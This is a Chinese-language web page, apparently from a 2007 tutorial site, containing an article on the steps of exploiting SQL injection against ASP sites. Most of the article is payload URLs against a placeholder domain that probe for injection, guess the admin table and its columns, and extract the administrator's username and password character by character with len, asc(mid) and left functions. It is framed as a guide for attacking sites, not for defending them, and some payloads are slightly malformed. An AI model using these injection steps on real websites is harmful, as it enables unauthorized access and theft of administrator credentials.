文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络编程数据库SQL注入利用的几大步骤
精品推荐
特别推荐
·SQL数据库完全使用手册
·进阶:精妙SQL语句介绍
·sql删除记录
·学习SQL语句之SQL语句大全
·数据备份失败的五个原因及解决办法
·解决SQL Server常见的七个经典问题
·SQL存储过程的概念,创建,调用,管理,删除,优点
·带你轻松接触13个数据库术语
·如何恢复系统数据库如何恢复系统数据库?
·通过实例讲解由浅入深学会存储过程
·学会三个范式快速成为数据库设计的高手
·SQL数据库应聘人员面试时经常被问的问题
·问答:查询分析器不能单步调试的的原因
·数据库基础知识:SQL中的IIF语句详解
·WindowsXP+IIS+PHP5+MySQL5+Zend+GD库+phpMyAdmin+PHPWind 5.3 安装教程
·你知道吗?优化数据库前的十大问题
·自动备份注意事项让你远离误删数据噩梦
·关于MSSQL数据库日志满的快速解决办法
·SQL安全设置攻略
·SQL注入的不常见方法
热点TOP10
·学习SQL语句之SQL语句大全
·SQL数据库完全使用手册
·玩转Windows桌面图标
·精妙SQL语句收集
·Transact SQL 常用语句以及函数
·一个简单的酒店系统的数据库设计
·sqlldr使用小结
·使用DatabaseMetaDate获取数据库信息
·WindowsXP+IIS+PHP5+MySQL5+Zend+GD库+phpMyAdmin+PHPWind 5.3 安装教程
·Delphi程序执行时实时生成报表
·图片保存到数据库和从数据库读取图片并显示(c#)
·VB.NET的数据库基础编程(1)
·SQL查询语句精华使用简要
·如何实现将vsflexgrid中修改的数据反馈到数据库中
·SQL优化34条
·SQL 新增/修改 表字段列的类型等
·还原数据库的经典做法
·通过分析SQL语句的执行计划优化SQL(二)
·通过Remoting service上传文件
·sql删除记录

SQL注入利用的几大步骤

日期:2007年7月8日 作者: 查看:[大字体 中字体 小字体]


  第一步:

  http://www.aaa.com/./show.asp?id=259
  http://www.aaa.com/./show.asp?id=259 and 1=1
  http://www.aaa.com/./show.asp?id=259 and 1=2
  简单判断是否可以注入


  第二步:

  猜测管理员登陆界面!什么admin.asp、admin_admin.asp之类的,猜不出来的话,快点想别的出路!猜出来了再继续猜:

  http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20*%20from%20admin)

  然后猜测登陆账户存在于哪个表中,这里猜的是admin。(假设存在)

  第三步:

  接下来是个关键!猜测admin表中有哪些字段,下面三条分别是id、username、password是否存在的猜测(假设都存在)。可以根据上面登陆界面里的变量名来猜字段!

  http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin)
  http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20username%20from%20admin)
  http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20password%20from%20admin)

  第四步:

  http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20id=1)

  猜测admin的ID是多少,注意我用的语法格式,这里假设猜出来ID=1。

  http://www.aaa.com/./show.asp?id=259and%20exists%20(select%20id%20from%20admin%20where len(username)=6%20and%20id=1)

  猜测username长度是否为6。

http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))>110%20and%20id=1)

  然后再猜他的用户名是什么,有的时候不能用mid,所以我一般都是直接用left函数猜,比如:
  http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20left(username,1)='a')

  第五步:

  重复第五步,只不过将username换成password而已。


[1] [2] 下一页 




上一篇:菜鸟学数据库之简单SQL语句小结

下一篇:把SQLSERVER的表和字段导出Excel

SQL注入利用的几大步骤 相关文章:
·绝对好用的注册表技巧
·非主流ps教程实用的技巧大全
·推荐:漂亮的手机上使用的墙纸图片分享下载
·制作网站的步骤和方法
·易学易用的数字五笔输入法
·在ASP.NET中防止注入攻击[翻译]
·asp.net程序中最常用的三十三种编程代码
·比较常用的25条Excel技巧整理放送
·整理:最常用的十款盗版软件
·常用的网络测试命令
SQL注入利用的几大步骤 相关软件:
·保证你快速致富的七个步骤
·目前中国最快最好用的XP系统 天宇7.5版美化GHOST XP
·从员工到老板的五个步骤
·最常用的下拉菜单!
·一套很实用的评估底稿
·MBA英译汉的标准及步骤
·XP PLUS 可用的激活
·DJ软件盘V2.0 iso 最实用的软件集
·目前最好用的虚拟机 RAR 经本人测试确实不错
·更快的批量注入网站

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot